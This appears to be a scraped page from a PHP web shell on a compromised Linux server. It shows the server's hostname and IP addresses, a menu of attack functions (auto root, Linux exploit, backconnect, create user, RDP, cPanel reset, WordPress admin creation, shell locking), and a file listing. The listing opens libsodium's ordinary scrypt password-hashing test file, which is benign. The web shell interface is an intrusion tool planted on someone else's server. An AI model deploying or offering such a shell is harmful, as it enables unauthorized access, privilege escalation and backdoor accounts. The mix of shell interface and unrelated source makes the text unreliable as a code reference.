Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libsodium-devel-1.0.18 /
[ HOME SHELL ]
Name
Size
Permission
Action
AUTHORS
4.78
KB
-rw-r--r--
ChangeLog
27.5
KB
-rw-r--r--
README.markdown
2.04
KB
-rw-r--r--
THANKS
2.24
KB
-rw-r--r--
aead_aes256gcm.c
145.83
KB
-rw-r--r--
aead_aes256gcm.exp
3
B
-rw-r--r--
aead_aes256gcm2.c
13.62
KB
-rw-r--r--
aead_aes256gcm2.exp
3
B
-rw-r--r--
aead_chacha20poly1305.c
14.77
KB
-rw-r--r--
aead_chacha20poly1305.exp
2.35
KB
-rw-r--r--
aead_chacha20poly13052.c
63.87
KB
-rw-r--r--
aead_chacha20poly13052.exp
3
B
-rw-r--r--
aead_xchacha20poly1305.c
8.4
KB
-rw-r--r--
aead_xchacha20poly1305.exp
1.95
KB
-rw-r--r--
auth.c
4.96
KB
-rw-r--r--
auth.exp
1.12
KB
-rw-r--r--
auth2.c
1.08
KB
-rw-r--r--
auth2.exp
164
B
-rw-r--r--
auth3.c
1.43
KB
-rw-r--r--
auth3.exp
2
B
-rw-r--r--
auth5.c
1.06
KB
-rw-r--r--
auth5.exp
0
B
-rw-r--r--
auth6.c
449
B
-rw-r--r--
auth6.exp
328
B
-rw-r--r--
auth7.c
1.14
KB
-rw-r--r--
auth7.exp
0
B
-rw-r--r--
box.c
4.42
KB
-rw-r--r--
box.exp
1.47
KB
-rw-r--r--
box2.c
3.31
KB
-rw-r--r--
box2.exp
1.31
KB
-rw-r--r--
box7.c
1.53
KB
-rw-r--r--
box7.exp
0
B
-rw-r--r--
box8.c
1.7
KB
-rw-r--r--
box8.exp
0
B
-rw-r--r--
box_easy.c
2.84
KB
-rw-r--r--
box_easy.exp
908
B
-rw-r--r--
box_easy2.c
5.42
KB
-rw-r--r--
box_easy2.exp
15
B
-rw-r--r--
box_seal.c
2.85
KB
-rw-r--r--
box_seal.exp
22
B
-rw-r--r--
box_seed.c
839
B
-rw-r--r--
box_seed.exp
328
B
-rw-r--r--
chacha20.c
7.63
KB
-rw-r--r--
chacha20.exp
20.19
KB
-rw-r--r--
cmptest.h
4.6
KB
-rw-r--r--
codecs.c
11.94
KB
-rw-r--r--
codecs.exp
417
B
-rw-r--r--
core1.c
1.18
KB
-rw-r--r--
core1.exp
164
B
-rw-r--r--
core2.c
1.19
KB
-rw-r--r--
core2.exp
164
B
-rw-r--r--
core3.c
3.19
KB
-rw-r--r--
core3.exp
195
B
-rw-r--r--
core4.c
981
B
-rw-r--r--
core4.exp
264
B
-rw-r--r--
core5.c
908
B
-rw-r--r--
core5.exp
164
B
-rw-r--r--
core6.c
1.31
KB
-rw-r--r--
core6.exp
164
B
-rw-r--r--
core_ed25519.c
16.35
KB
-rw-r--r--
core_ed25519.exp
1.18
KB
-rw-r--r--
core_ristretto255.c
11.36
KB
-rw-r--r--
core_ristretto255.exp
458
B
-rw-r--r--
ed25519_convert.c
3.18
KB
-rw-r--r--
ed25519_convert.exp
167
B
-rw-r--r--
generichash.c
144.46
KB
-rw-r--r--
generichash.exp
4.25
KB
-rw-r--r--
generichash2.c
2.41
KB
-rw-r--r--
generichash2.exp
4.13
KB
-rw-r--r--
generichash3.c
7.19
KB
-rw-r--r--
generichash3.exp
5.51
KB
-rw-r--r--
hash.c
1.47
KB
-rw-r--r--
hash.exp
388
B
-rw-r--r--
hash2.exp
129
B
-rw-r--r--
hash3.c
335
B
-rw-r--r--
hash3.exp
129
B
-rw-r--r--
kdf.c
2.31
KB
-rw-r--r--
kdf.exp
5.97
KB
-rw-r--r--
keygen.c
2.62
KB
-rw-r--r--
keygen.exp
14
B
-rw-r--r--
kx.c
6.21
KB
-rw-r--r--
kx.exp
478
B
-rw-r--r--
metamorphic.c
5.48
KB
-rw-r--r--
metamorphic.exp
3
B
-rw-r--r--
misuse.c
4.37
KB
-rw-r--r--
misuse.exp
0
B
-rw-r--r--
onetimeauth.c
2.32
KB
-rw-r--r--
onetimeauth.exp
164
B
-rw-r--r--
onetimeauth2.c
1.38
KB
-rw-r--r--
onetimeauth2.exp
2
B
-rw-r--r--
onetimeauth7.c
948
B
-rw-r--r--
onetimeauth7.exp
0
B
-rw-r--r--
pwhash_argon2i.c
21.74
KB
-rw-r--r--
pwhash_argon2i.exp
3.03
KB
-rw-r--r--
pwhash_argon2id.c
25.31
KB
-rw-r--r--
pwhash_argon2id.exp
3.61
KB
-rw-r--r--
pwhash_scrypt.c
18.18
KB
-rw-r--r--
pwhash_scrypt.exp
4.5
KB
-rw-r--r--
pwhash_scrypt_ll.c
1.68
KB
-rw-r--r--
pwhash_scrypt_ll.exp
714
B
-rw-r--r--
quirks.h
488
B
-rw-r--r--
randombytes.c
3.87
KB
-rw-r--r--
randombytes.exp
220
B
-rw-r--r--
scalarmult.c
2.42
KB
-rw-r--r--
scalarmult.exp
260
B
-rw-r--r--
scalarmult2.c
794
B
-rw-r--r--
scalarmult2.exp
164
B
-rw-r--r--
scalarmult5.c
1.18
KB
-rw-r--r--
scalarmult5.exp
164
B
-rw-r--r--
scalarmult6.c
1.51
KB
-rw-r--r--
scalarmult6.exp
164
B
-rw-r--r--
scalarmult7.c
909
B
-rw-r--r--
scalarmult7.exp
2
B
-rw-r--r--
scalarmult8.c
24.37
KB
-rw-r--r--
scalarmult8.exp
2.16
KB
-rw-r--r--
scalarmult_ed25519.c
4.92
KB
-rw-r--r--
scalarmult_ed25519.exp
3
B
-rw-r--r--
scalarmult_ristretto255.c
1.87
KB
-rw-r--r--
scalarmult_ristretto255.exp
1.06
KB
-rw-r--r--
secretbox.c
3.5
KB
-rw-r--r--
secretbox.exp
1.47
KB
-rw-r--r--
secretbox2.c
2.37
KB
-rw-r--r--
secretbox2.exp
672
B
-rw-r--r--
secretbox7.c
1.05
KB
-rw-r--r--
secretbox7.exp
0
B
-rw-r--r--
secretbox8.c
1.2
KB
-rw-r--r--
secretbox8.exp
0
B
-rw-r--r--
secretbox_easy.c
4.44
KB
-rw-r--r--
secretbox_easy.exp
4.02
KB
-rw-r--r--
secretbox_easy2.c
2.54
KB
-rw-r--r--
secretbox_easy2.exp
10
B
-rw-r--r--
secretstream.c
11.43
KB
-rw-r--r--
secretstream.exp
3
B
-rw-r--r--
shorthash.c
968
B
-rw-r--r--
shorthash.exp
1.06
KB
-rw-r--r--
sign.c
2.65
MB
-rw-r--r--
sign.exp
512
B
-rw-r--r--
siphashx24.c
1.02
KB
-rw-r--r--
siphashx24.exp
2.06
KB
-rw-r--r--
sodium_core.c
936
B
-rw-r--r--
sodium_core.exp
17
B
-rw-r--r--
sodium_utils.c
8.22
KB
-rw-r--r--
sodium_utils.exp
756
B
-rw-r--r--
sodium_utils2.c
2.27
KB
-rw-r--r--
sodium_utils2.exp
46
B
-rw-r--r--
sodium_utils3.c
1.41
KB
-rw-r--r--
sodium_utils3.exp
43
B
-rw-r--r--
sodium_version.c
387
B
-rw-r--r--
sodium_version.exp
6
B
-rw-r--r--
stream.c
2.71
KB
-rw-r--r--
stream.exp
42.58
KB
-rw-r--r--
stream2.c
1.58
KB
-rw-r--r--
stream2.exp
130
B
-rw-r--r--
stream3.c
979
B
-rw-r--r--
stream3.exp
164
B
-rw-r--r--
stream4.c
2.02
KB
-rw-r--r--
stream4.exp
672
B
-rw-r--r--
verify1.c
2.05
KB
-rw-r--r--
verify1.exp
6
B
-rw-r--r--
xchacha20.c
25.49
KB
-rw-r--r--
xchacha20.exp
482
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pwhash_scrypt.c
#define TEST_NAME "pwhash_scrypt" #include "cmptest.h" #define OUT_LEN 128 #define OPSLIMIT 1000000 #define MEMLIMIT 10000000 static void tv(void) { static struct { const char *passwd_hex; size_t passwdlen; const char *salt_hex; size_t outlen; unsigned long long opslimit; size_t memlimit; } tests[] = { { "a347ae92bce9f80f6f595a4480fc9c2fe7e7d7148d371e9487d75f5c23008ffae0" "65577a928febd9b1973a5a95073acdbeb6a030cfc0d79caa2dc5cd011cef02c08d" "a232d76d52dfbca38ca8dcbd665b17d1665f7cf5fe59772ec909733b24de97d6f5" "8d220b20c60d7c07ec1fd93c52c31020300c6c1facd77937a597c7a6", 127, "5541fbc995d5c197ba290346d2c559dedf405cf97e5f95482143202f9e74f5c2", 155, 481326, 7256678 }, { "e125cee61c8cb7778d9e5ad0a6f5d978ce9f84de213a8556d9ffe202020ab4a6ed" "9074a4eb3416f9b168f137510f3a30b70b96cbfa219ff99f6c6eaffb15c06b60e0" "0cc2890277f0fd3c622115772f7048adaebed86e", 86, "f1192dd5dc2368b9cd421338b22433455ee0a3699f9379a08b9650ea2c126f0d", 250, 535778, 7849083 }, { "92263cbf6ac376499f68a4289d3bb59e5a22335eba63a32e6410249155b956b6a3" "b48d4a44906b18b897127300b375b8f834f1ceffc70880a885f47c33876717e392" "be57f7da3ae58da4fd1f43daa7e44bb82d3717af4319349c24cd31e46d295856b0" "441b6b289992a11ced1cc3bf3011604590244a3eb737ff221129215e4e4347f491" "5d41292b5173d196eb9add693be5319fdadc242906178bb6c0286c9b6ca6012746" "711f58c8c392016b2fdfc09c64f0f6b6ab7b", 183, "3b840e20e9555e9fb031c4ba1f1747ce25cc1d0ff664be676b9b4a90641ff194", 249, 311757, 7994791 }, { "027b6d8e8c8c474e9b69c7d9ed4f9971e8e1ce2f6ba95048414c3970f0f09b70e3" "b6c5ae05872b3d8678705b7d381829c351a5a9c88c233569b35d6b0b809df44b64" "51a9c273f1150e2ef8a0b5437eb701e373474cd44b97ef0248ebce2ca0400e1b53" "f3d86221eca3f18eb45b702b9172440f774a82cbf1f6f525df30a6e293c873cce6" "9bb078ed1f0d31e7f9b8062409f37f19f8550aae", 152, "eb2a3056a09ad2d7d7f975bcd707598f24cd32518cde3069f2e403b34bfee8a5", 5, 643464, 1397645 }, { "4a857e2ee8aa9b6056f2424e84d24a72473378906ee04a46cb05311502d5250b82" "ad86b83c8f20a23dbb74f6da60b0b6ecffd67134d45946ac8ebfb3064294bc097d" "43ced68642bfb8bbbdd0f50b30118f5e", 82, "39d82eef32010b8b79cc5ba88ed539fbaba741100f2edbeca7cc171ffeabf258", 190, 758010, 5432947 }, { "1845e375479537e9dd4f4486d5c91ac72775d66605eeb11a787b78a7745f1fd005" "2d526c67235dbae1b2a4d575a74cb551c8e9096c593a497aee74ba3047d911358e" "de57bc27c9ea1829824348daaab606217cc931dcb6627787bd6e4e5854f0e8", 97, "3ee91a805aa62cfbe8dce29a2d9a44373a5006f4a4ce24022aca9cecb29d1473", 212, 233177, 13101817 }, { "c7b09aec680e7b42fedd7fc792e78b2f6c1bea8f4a884320b648f81e8cf515e8ba" "9dcfb11d43c4aae114c1734aa69ca82d44998365db9c93744fa28b63fd16000e82" "61cbbe083e7e2da1e5f696bde0834fe53146d7e0e35e7de9920d041f5a5621aabe" "02da3e2b09b405b77937efef3197bd5772e41fdb73fb5294478e45208063b5f58e" "089dbeb6d6342a909c1307b3fff5fe2cf4da56bdae50848f", 156, "039c056d933b475032777edbaffac50f143f64c123329ed9cf59e3b65d3f43b6", 178, 234753, 4886999 }, { "8f3a06e2fd8711350a517bb12e31f3d3423e8dc0bb14aac8240fca0995938d59bb" "37bd0a7dfc9c9cc0705684b46612e8c8b1d6655fb0f9887562bb9899791a0250d1" "320f945eda48cdc20c233f40a5bb0a7e3ac5ad7250ce684f68fc0b8c9633bfd75a" "ad116525af7bdcdbbdb4e00ab163fd4df08f243f12557e", 122, "90631f686a8c3dbc0703ffa353bc1fdf35774568ac62406f98a13ed8f47595fd", 55, 695191, 15738350 }, { "b540beb016a5366524d4605156493f9874514a5aa58818cd0c6dfffaa9e90205f1" "7b", 34, "44071f6d181561670bda728d43fb79b443bb805afdebaf98622b5165e01b15fb", 231, 78652, 6631659 }, { "a14975c26c088755a8b715ff2528d647cd343987fcf4aa25e7194a8417fb2b4b3f" "7268da9f3182b4cfb22d138b2749d673a47ecc7525dd15a0a3c66046971784bb63" "d7eae24cc84f2631712075a10e10a96b0e0ee67c43e01c423cb9c44e5371017e9c" "496956b632158da3fe12addecb88912e6759bc37f9af2f45af72c5cae3b179ffb6" "76a697de6ebe45cd4c16d4a9d642d29ddc0186a0a48cb6cd62bfc3dd229d313b30" "1560971e740e2cf1f99a9a090a5b283f35475057e96d7064e2e0fc81984591068d" "55a3b4169f22cccb0745a2689407ea1901a0a766eb99", 220, "3d968b2752b8838431165059319f3ff8910b7b8ecb54ea01d3f54769e9d98daf", 167, 717248, 10784179 }, }; char passwd[256]; unsigned char salt[crypto_pwhash_scryptsalsa208sha256_SALTBYTES]; unsigned char out[256]; char out_hex[256 * 2 + 1]; size_t i = 0U; do { sodium_hex2bin((unsigned char *) passwd, sizeof passwd, tests[i].passwd_hex, strlen(tests[i].passwd_hex), NULL, NULL, NULL); sodium_hex2bin(salt, sizeof salt, tests[i].salt_hex, strlen(tests[i].salt_hex), NULL, NULL, NULL); if (crypto_pwhash_scryptsalsa208sha256( out, (unsigned long long) tests[i].outlen, passwd, tests[i].passwdlen, (const unsigned char *) salt, tests[i].opslimit, tests[i].memlimit) != 0) { printf("pwhash failure\n"); } sodium_bin2hex(out_hex, sizeof out_hex, out, tests[i].outlen); printf("%s\n", out_hex); } while (++i < (sizeof tests) / (sizeof tests[0])); } static void tv2(void) { static struct { const char *passwd_hex; size_t passwdlen; const char *salt_hex; size_t outlen; unsigned long long opslimit; size_t memlimit; } tests[] = { { "a347ae92bce9f80f6f595a4480fc9c2fe7e7d7148d371e9487d75f5c23008ffae0" "65577a928febd9b1973a5a95073acdbeb6a030cfc0d79caa2dc5cd011cef02c08d" "a232d76d52dfbca38ca8dcbd665b17d1665f7cf5fe59772ec909733b24de97d6f5" "8d220b20c60d7c07ec1fd93c52c31020300c6c1facd77937a597c7a6", 127, "5541fbc995d5c197ba290346d2c559dedf405cf97e5f95482143202f9e74f5c2", 155, 64, 1397645 }, { "a347ae92bce9f80f6f595a4480fc9c2fe7e7d7148d371e9487d75f5c23008ffae0" "65577a928febd9b1973a5a95073acdbeb6a030cfc0d79caa2dc5cd011cef02c08d" "a232d76d52dfbca38ca8dcbd665b17d1665f7cf5fe59772ec909733b24de97d6f5" "8d220b20c60d7c07ec1fd93c52c31020300c6c1facd77937a597c7a6", 127, "5541fbc995d5c197ba290346d2c559dedf405cf97e5f95482143202f9e74f5c2", 155, 32768, 1397645 }, }; char passwd[256]; unsigned char salt[crypto_pwhash_scryptsalsa208sha256_SALTBYTES]; unsigned char out[256]; char out_hex[256 * 2 + 1]; size_t i = 0U; do { sodium_hex2bin((unsigned char *) passwd, sizeof passwd, tests[i].passwd_hex, strlen(tests[i].passwd_hex), NULL, NULL, NULL); sodium_hex2bin(salt, sizeof salt, tests[i].salt_hex, strlen(tests[i].salt_hex), NULL, NULL, NULL); if (crypto_pwhash_scryptsalsa208sha256( out, (unsigned long long) tests[i].outlen, passwd, tests[i].passwdlen, (const unsigned char *) salt, tests[i].opslimit, tests[i].memlimit) != 0) { printf("pwhash failure\n"); } sodium_bin2hex(out_hex, sizeof out_hex, out, tests[i].outlen); printf("%s\n", out_hex); } while (++i < (sizeof tests) / (sizeof tests[0])); } static void tv3(void) { static struct { const char *passwd; const char *out; } tests[] = { { "^T5H$JYt39n%K*j:W]!1s?vg!:jGi]Ax?..l7[p0v:1jHTpla9;]bUN;?bWyCbtqg " "nrDFal+Jxl3,2`#^tFSu%v_+7iYse8-cCkNf!tD=KrW)", "$7$B6....1....75gBMAGwfFWZqBdyF3WdTQnWdUsuTiWjG1fF9c1jiSD$tc8RoB3." "Em3/zNgMLWo2u00oGIoTyJv4fl3Fl8Tix72" }, { "bl72h6#y<':MFRZ>B IA1=NRkCKS%W8`1I.2uQxJN0g)N N aTt^4K!Iw5r " "H6;crDsv^a55j9tsk'/GqweZn;cdk6+F_St6:#*=?ZCD_lw>.", "$7$A6....3....Iahc6qM0.UQJHVgE4h9oa1/" "4OWlWLm9CCtfguvz6bQD$QnXCo3M7nIqtry2WKsUZ5gQ.mY0wAlJu." "WUhtE8vF66" }, { "Py " ">e.5b+tLo@rL`dC2k@eJ&4eVl!W=JJ4+k&mAt@gt',FS1JjqKW3aq21:]^kna`" "mde7kVkN5NrpKUptu)@4*b&?BE_sJMG1=&@`3GBCV]Wg7xwgo7x3El", "$7$96..../....f6bEusKt79kK4wdYN0ki2nw4bJQ7P3rN6k3BSigsK/" "D$Dsvuw7vXj5xijmrb/NOhdgoyK/OiSIYv88cEtl9Cik7" }, { "2vj;Um]FKOL27oam(:Uo8+UmSTvb1FD*h?jk_,S=;RDgF-$Fjk?]9yvfxe@fN^!NN(" "Cuml?+2Raa", "$7$86....I....7XwIxLtCx4VphmFeUa6OGuGJrFaIaYzDiLNu/" "tyUPhD$U3q5GCEqCWxMwh.YQHDJrlg7FIZgViv9pcXE3h1vg61" }, { "CT=[9uUoGav,J`kU+348tA50ue#sL:ABZ3QgF+r[#vh:tTOiL>s8tv%,Jeo]jH/" "_4^i(*jD-_ku[9Ko[=86 06V", "$7$A6....2....R3.bjH6YS9wz9z8Jsj.3weGQ3J80ZZElGw2oVux1TP6$" "i5u6lFzXDHaIgYEICinLD6WNaovbiXP8SnLrDRdKgA9" }, { "J#wNn`hDgOpTHNI.w^1a70%f,.9V_m038H_JIJQln`vdWnn/" "rmILR?9H5g(+`;@H(2VosN9Fgk[WEjaBr'yB9Q19-imNa04[Mk5kvGcSn-TV", "$7$B6....1....Dj1y.4mF1J9XmT/6IDskYdCLaPFJTq9xcCwXQ1DpT92$92/" "hYfZLRq1nTLyIz.uc/dC6wLqwnsoqpkadrCXusm6" }, { "j4BS38Asa;p)[K+9TY!3YDj<LK-`nLVXQw9%*QfM", "$7$B6....1....5Ods8mojVwXJq4AywF/uI9BdMSiJ/zT8hQP/" "4cB68VC$nk4ExHNXJ802froj51/1wJTrSZvTIyyK7PecOxRRaz0" }, { "M.R>Qw+!qJb]>pP :_.9`dxM9k [eR7Y!yL-3)sNs[R,j_/^ " "TH=5ny'15>6UXWcQW^6D%XCsO[vN[%ReA-`tV1vW(Nt*0KVK#]45P_A", "$7$B6....1....D/" "eyk8N5y6Z8YVQEsw521cTx.9zzLuK7YDs1KMMh.o4$alfW8ZbsUWnXc." "vqon2zoljVk24Tt1.IsCuo2KurvS2" }, { "K3S=KyH#)36_?]LxeR8QNKw6X=gFb'ai$C%29V* " "tyh^Wo$TN-#Q4qkmtTCf0LLb.^E$0uykkP", "$7$B6....1....CuBuU97xgAage8whp/" "JNKobo0TFbsORGVbfcQIefyP8$aqalP." "XofGViB8EPLONqHma8vs1xc9uTIMYh9CgE.S8" }, { "Y0!?iQa9M%5ekffW(`", "$7$A6....1....TrXs5Zk6s8sWHpQgWDIXTR8kUU3s6Jc3s.DtdS8M2i4$" "a4ik5hGDN7foMuHOW.cp.CtX01UyCeO0.JAG.AHPpx5" }, /* Invalid pwhash strings */ { "Y0!?iQa9M%5ekffW(`", "$7$A6....1....$TrXs5Zk6s8sWHpQgWDIXTR8kUU3s6Jc3s.DtdS8M2i4" "a4ik5hGDN7foMuHOW.cp.CtX01UyCeO0.JAG.AHPpx5" }, { "Y0!?iQa9M%5ekffW(`", "$7$.6....1....TrXs5Zk6s8sWHpQgWDIXTR8kUU3s6Jc3s.DtdS8M2i4$" "a4ik5hGDN7foMuHOW.cp.CtX01UyCeO0.JAG.AHPpx5" }, { "Y0!?iQa9M%5ekffW(`", "$7$A.....1....TrXs5Zk6s8sWHpQgWDIXTR8kUU3s6Jc3s.DtdS8M2i4$" "a4ik5hGDN7foMuHOW.cp.CtX01UyCeO0.JAG.AHPpx5" }, { "Y0!?iQa9M%5ekffW(`", "$7$A6.........TrXs5Zk6s8sWHpQgWDIXTR8kUU3s6Jc3s.DtdS8M2i4$" "a4ik5hGDN7foMuHOW.cp.CtX01UyCeO0.JAG.AHPpx5" }, { "Y0!?iQa9M%5ekffW(`", "$7$A6....1....TrXs5Zk6s8sWHpQgWDIXTR8kUU3s6Jc3s.DtdS8M2i44269$" "a4ik5hGDN7foMuHOW.cp.CtX01UyCeO0.JAG.AH" }, { "Y0!?iQa9M%5ekffW(`", "$7$A6....1....TrXs5Zk6s8sWHpQgWDIXTR8kUU3s6Jc3s.DtdS8M2i4$" "a4ik5hGDN7foMuHOW.cp.CtX01UyCeO0.JAG.AHPpx54269" }, { "Y0!?iQa9M%5ekffW(`", "$7^A6....1....TrXs5Zk6s8sWHpQgWDIXTR8kUU3s6Jc3s.DtdS8M2i4$" "a4ik5hGDN7foMuHOW.cp.CtX01UyCeO0.JAG.AHPpx5" }, { "Y0!?iQa9M%5ekffW(`", "$7$!6....1....TrXs5Zk6s8sWHpQgWDIXTR8kUU3s6Jc3s.DtdS8M2i4$" "a4ik5hGDN7foMuHOW.cp.CtX01UyCeO0.JAG.AHPpx5" }, { "Y0!?iQa9M%5ekffW(`", "$7$A!....1....TrXs5Zk6s8sWHpQgWDIXTR8kUU3s6Jc3s.DtdS8M2i4$" "a4ik5hGDN7foMuHOW.cp.CtX01UyCeO0.JAG.AHPpx5" }, { "Y0!?iQa9M%5ekffW(`", "$7$A6....!....TrXs5Zk6s8sWHpQgWDIXTR8kUU3s6Jc3s.DtdS8M2i4$" "a4ik5hGDN7foMuHOW.cp.CtX01UyCeO0.JAG.AHPpx5" }, { "", "$7$A6....1....TrXs5Zk6s8sWHpQgWDIXTR8kUU3s6Jc3s.DtdS8M2i4$" "a4ik5hGDN7foMuHOW.cp.CtX01UyCeO0.JAG.AHPpx5" }, { "Y0!?iQa9M%5ekffW(`", "$7fA6....1....TrXs5Zk6s8sWHpQgWDIXTR8kUU3s6Jc3s.DtdS8M2i4#" "a4ik5hGDN7foMuHOW.cp.CtX01UyCeO0.JAG.AHPpx5" }, { "Y0!?iQa9M%5ekffW(`", "$7$AX....1....TrXs5Zk6s8sWHpQgWDIXTR8kUU3s6Jc3s.DtdS8M2i4$" "a4ik5hGDN7foMuHOW.cp.CtX01UyCeO0.JAG.AHPpx5" }, { "Y0!?iQa9M%5ekffW(`", "$7$A6....1!...TrXs5Zk6s8sWHpQgWDIXTR8kUU3s6Jc3s.DtdS8M2i4$" "a4ik5hGDN7foMuHOW.cp.CtX01UyCeO0.JAG.AHPpx5" }, { "Y0!?iQa9M%5ekffW(`", "$7$A6....1" }, { "Y0!?iQa9M%5ekffW(`", "$7$" }, { "Y0!?iQa9M%5ekffW(`", "" }, { "Y0!?iQa9M%5ekffW(`", "$7$A6....1....TrXs5Zk6s8sWHpQgWDIXTR8kUU3s6Jc3s.DtdS8M2i4$" }, { "test", "$7$.6..../.....lgPchkGHqbeONR/xtuXyjCrt9kUSg6NlKFQO0OSxo/$.DbajbPYH9T7sg3fOtcgxvJzzfIgJBIxMkeQ8b24YQ." }, { "test", "$7$z6..../.....lgPchkGHqbeONR/xtuXyjCrt9kUSg6NlKFQO0OSxo/$.DbajbPYH9T7sg3fOtcgxvJzzfIgJBIxMkeQ8b24YQ." }, { "test", "$7$8zzzzzzzzzz.lgPchkGHqbeONR/xtuXyjCrt9kUSg6NlKFQO0OSxo/$.DbajbPYH9T7sg3fOtcgxvJzzfIgJBIxMkeQ8b24YQ." }, { "test", "$7$8.....zzzzz.lgPchkGHqbeONR/xtuXyjCrt9kUSg6NlKFQO0OSxo/$.DbajbPYH9T7sg3fOtcgxvJzzfIgJBIxMkeQ8b24YQ." }, { "test", "$7$86..../..../lgPchkGHqbeONR/xtuXyjCrt9kUSg6NlKFQO0OSxo/$.DbajbPYH9T7sg3fOtcgxvJzzfIgJBIxMkeQ8b24YQ." } }; char * out; char * passwd; size_t i = 0U; do { out = (char *) sodium_malloc(strlen(tests[i].out) + 1U); assert(out != NULL); memcpy(out, tests[i].out, strlen(tests[i].out) + 1U); passwd = (char *) sodium_malloc(strlen(tests[i].passwd) + 1U); assert(passwd != NULL); memcpy(passwd, tests[i].passwd, strlen(tests[i].passwd) + 1U); if (crypto_pwhash_scryptsalsa208sha256_str_verify( out, passwd, strlen(passwd)) != 0) { printf("pwhash_str failure: [%u]\n", (unsigned int) i); } sodium_free(out); sodium_free(passwd); } while (++i < (sizeof tests) / (sizeof tests[0])); } static void str_tests(void) { char *str_out; char *str_out2; char *salt; const char *passwd = "Correct Horse Battery Staple"; salt = (char *) sodium_malloc(crypto_pwhash_scryptsalsa208sha256_SALTBYTES); str_out = (char *) sodium_malloc(crypto_pwhash_scryptsalsa208sha256_STRBYTES); str_out2 = (char *) sodium_malloc(crypto_pwhash_scryptsalsa208sha256_STRBYTES); memcpy(salt, "[<~A 32-bytes salt for scrypt~>]", crypto_pwhash_scryptsalsa208sha256_SALTBYTES); if (crypto_pwhash_scryptsalsa208sha256_str(str_out, passwd, strlen(passwd), OPSLIMIT, MEMLIMIT) != 0) { printf("pwhash_str failure\n"); } if (crypto_pwhash_scryptsalsa208sha256_str(str_out2, passwd, strlen(passwd), OPSLIMIT, MEMLIMIT) != 0) { printf("pwhash_str(2) failure\n"); } if (strcmp(str_out, str_out2) == 0) { printf("pwhash_str doesn't generate different salts\n"); } if (crypto_pwhash_scryptsalsa208sha256_str_needs_rehash (str_out, OPSLIMIT, MEMLIMIT) != 0) { printf("needs_rehash() false positive\n"); } if (crypto_pwhash_scryptsalsa208sha256_str_needs_rehash (str_out, OPSLIMIT, MEMLIMIT / 2) != 1 || crypto_pwhash_scryptsalsa208sha256_str_needs_rehash (str_out, OPSLIMIT / 2, MEMLIMIT) != 1 || crypto_pwhash_scryptsalsa208sha256_str_needs_rehash (str_out, OPSLIMIT, MEMLIMIT * 2) != 1 || crypto_pwhash_scryptsalsa208sha256_str_needs_rehash (str_out, OPSLIMIT * 2, MEMLIMIT) != 1) { printf("needs_rehash() false negative\n"); } if (crypto_pwhash_scryptsalsa208sha256_str_needs_rehash (str_out + 1, OPSLIMIT, MEMLIMIT) != -1) { printf("needs_rehash() didn't fail with an invalid hash string\n"); } if (crypto_pwhash_scryptsalsa208sha256_str_verify(str_out, passwd, strlen(passwd)) != 0) { printf("pwhash_str_verify failure\n"); } if (crypto_pwhash_scryptsalsa208sha256_str_verify(str_out, passwd, strlen(passwd)) != 0) { printf("pwhash_str_verify failure\n"); } str_out[14]++; if (crypto_pwhash_scryptsalsa208sha256_str_verify(str_out, passwd, strlen(passwd)) == 0) { printf("pwhash_str_verify(2) failure\n"); } str_out[14]--; assert(str_out[crypto_pwhash_scryptsalsa208sha256_STRBYTES - 1U] == 0); assert(crypto_pwhash_scryptsalsa208sha256_str_needs_rehash (str_out, 0, 0) == 1); assert(crypto_pwhash_str_needs_rehash(str_out, 0, 0) == -1); assert(crypto_pwhash_str_needs_rehash(str_out, OPSLIMIT, MEMLIMIT) == -1); assert(crypto_pwhash_scryptsalsa208sha256_str_needs_rehash ("", OPSLIMIT, MEMLIMIT) == -1); sodium_free(salt); sodium_free(str_out); sodium_free(str_out2); } int main(void) { tv(); tv2(); tv3(); str_tests(); assert(crypto_pwhash_scryptsalsa208sha256_bytes_min() > 0U); assert(crypto_pwhash_scryptsalsa208sha256_bytes_max() > crypto_pwhash_scryptsalsa208sha256_bytes_min()); assert(crypto_pwhash_scryptsalsa208sha256_passwd_max() > crypto_pwhash_scryptsalsa208sha256_passwd_min()); assert(crypto_pwhash_scryptsalsa208sha256_saltbytes() > 0U); assert(crypto_pwhash_scryptsalsa208sha256_strbytes() > 1U); assert(crypto_pwhash_scryptsalsa208sha256_strbytes() > strlen(crypto_pwhash_scryptsalsa208sha256_strprefix())); assert(crypto_pwhash_scryptsalsa208sha256_opslimit_min() > 0U); assert(crypto_pwhash_scryptsalsa208sha256_opslimit_max() > 0U); assert(crypto_pwhash_scryptsalsa208sha256_memlimit_min() > 0U); assert(crypto_pwhash_scryptsalsa208sha256_memlimit_max() > 0U); assert(crypto_pwhash_scryptsalsa208sha256_opslimit_interactive() > 0U); assert(crypto_pwhash_scryptsalsa208sha256_memlimit_interactive() > 0U); assert(crypto_pwhash_scryptsalsa208sha256_opslimit_sensitive() > 0U); assert(crypto_pwhash_scryptsalsa208sha256_memlimit_sensitive() > 0U); printf("OK\n"); return 0; }
Close